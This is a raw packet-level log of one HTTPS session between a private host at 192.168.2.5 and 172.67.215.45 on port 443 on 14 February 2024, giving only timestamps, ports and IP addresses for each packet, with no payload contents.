Feb 14, 2024 09:08:18.343961000 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.343986034 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.344007969 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.344062090 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.344101906 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.344122887 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.344126940 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.344157934 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.344178915 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.344693899 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.344734907 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.344762087 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.344768047 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.344798088 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.344818115 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.345015049 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.345055103 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.345081091 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.345086098 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.345114946 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.345135927 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.345640898 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.345681906 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.345709085 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.345714092 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.345742941 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.345762968 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.345822096 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.345863104 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.345885038 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.345896006 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.345923901 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.345943928 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.346591949 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.346628904 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.346667051 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.346672058 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.346703053 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.346723080 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.346739054 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.346779108 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.346798897 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.346803904 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.346833944 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.346853971 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.347440958 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.347480059 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.347512007 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.347518921 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.347547054 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.347565889 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.347785950 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.347822905 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.347894907 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.347901106 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.347942114 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.349303961 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.349340916 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.349379063 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.349386930 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.349412918 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.349432945 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.349519014 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.349556923 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.349582911 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.349587917 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.349618912 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.349637985 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.351407051 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.351447105 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.351481915 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.351496935 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.351512909 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.351533890 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.351558924 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.351599932 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.351619005 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.351624012 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.351653099 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.351672888 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.352189064 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.352225065 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.352255106 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.352262020 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.352292061 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.352312088 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.352334976 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.352371931 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.352390051 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.352395058 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.352423906 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.352446079 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.353858948 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.353914976 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.353924990 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.353935003 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.353959084 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.353977919 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.354154110 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.354193926 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.354216099 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.354221106 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.354254961 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.355448961 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.355488062 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.355518103 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.355525970 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.355550051 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.355564117 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.355578899 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.355617046 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.355633974 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.355638027 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.355673075 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.357105017 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.357141972 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.357172012 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.357180119 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.357198954 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.357218027 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.357289076 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.357327938 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.357358932 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.357362986 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.357384920 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.357408047 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.358213902 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.358253956 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.358278990 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.358287096 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.358313084 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.358333111 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.358474970 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.358513117 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.358541965 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.358546972 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.358578920 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.358597994 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.359966040 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.360002995 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.360034943 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.360042095 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.360069990 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.360090017 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.360137939 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.360177994 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.360193968 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.360209942 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.360240936 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.360260963 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.360938072 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.360975981 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.361006021 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.361013889 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.361038923 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.361057997 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.361088991 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.361125946 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.361144066 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.361149073 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.361180067 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.361200094 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.362512112 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.362550974 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.362586975 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.362595081 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.362622976 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.362642050 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.362654924 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.362692118 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.362714052 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.362718105 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.362754107 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.363970995 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.364010096 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.364042044 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.364048004 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.364068985 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.364089012 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.364120960 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.364157915 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.364177942 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.364182949 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.364219904 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.365494967 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.365534067 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.365575075 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.365582943 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.365602970 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.365623951 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.365736008 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.365772009 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.365797043 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.365803003 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.365832090 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.365853071 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.366311073 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.366349936 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.366378069 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.366384029 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.366415977 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.366434097 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.366493940 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.366533041 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.366564035 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.366569042 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.366597891 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.366617918 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.367965937 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.368005037 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.368036032 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.368053913 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.368073940 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.368093014 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.368180037 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.368217945 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.368241072 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.368247032 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.368275881 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.368297100 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.368923903 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.368963003 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.368988991 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.368999004 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.369024992 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.369045019 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.369232893 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.369271040 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.369298935 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.369303942 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.369333982 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.369354963 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.371256113 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.371295929 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.371325016 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.371344090 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.371366024 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.371382952 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.371531010 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.371570110 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.371593952 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.371601105 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.371629953 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.371649027 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.372179031 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.372215986 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.372240067 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.372251034 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.372277975 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.372298002 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.372479916 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.372519970 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.372548103 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.372554064 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.372581005 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.372621059 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.373605013 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.373644114 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.373672009 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.373686075 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.373713017 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.373733044 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.373820066 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.373857021 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.373893023 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.373898983 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.373922110 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.373950005 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.374784946 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.374824047 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.374870062 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.374882936 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.374917984 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.374949932 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.376456976 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.376497984 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.376542091 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.376558065 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.376586914 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.376616955 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.376636982 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.376673937 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.376698971 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.376703978 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.376746893 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.376787901 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.376826048 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.376857042 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.376861095 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.376892090 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.376924038 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.377413988 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.377453089 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.377487898 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.377495050 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.377535105 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.377561092 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.378989935 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.379030943 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.379069090 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.379081011 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.379141092 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.379220009 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.379259109 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.379281998 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.379287958 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.379306078 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.379333019 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.379359961 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.379398108 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.379415989 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.379420996 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.379456997 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.379753113 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.379792929 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.379822969 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.379827023 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.379852057 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.379872084 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.381361008 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.381402969 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.381434917 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.381449938 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.381464958 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.381483078 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.381501913 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.381532907 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.381570101 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.381589890 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.381596088 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.381632090 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.382905960 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.382946014 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.382973909 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.382983923 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.383011103 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.383029938 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.383295059 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.383333921 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.383375883 CET	49712	443	192.168.2.5	172.67.215.45
